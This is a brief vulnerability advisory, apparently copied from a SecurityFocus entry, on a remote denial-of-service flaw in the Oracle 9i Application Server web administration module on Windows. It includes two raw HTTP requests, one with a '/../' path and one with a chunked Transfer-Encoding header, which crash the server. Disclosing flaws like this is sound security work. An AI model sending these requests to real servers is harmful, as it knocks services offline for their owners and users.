16 lines
No EOL
639 B
Text
16 lines
No EOL
639 B
Text
source: http://www.securityfocus.com/bid/5902/info
|
|
|
|
Oracle 9i Application Server (9iAS) allows remote administration via a web access module. This vulnerability affects Oracle 9iAS running on Microsoft Windows.
|
|
|
|
When a custom request is sent to the Web Administration module, the module may react unpredictably. By sending a malicious custom request to the module, it is possible to cause the administration server to crash. A manual restart of the server is required to resume service.
|
|
|
|
GET /../ HTTP/1.1
|
|
host: hostname
|
|
<ENTER>
|
|
<ENTER>
|
|
|
|
GET /example.html/ HTTP/1.1
|
|
host: host name
|
|
Transfer-Encoding: chunked
|
|
<ENTER>
|
|
<ENTER> |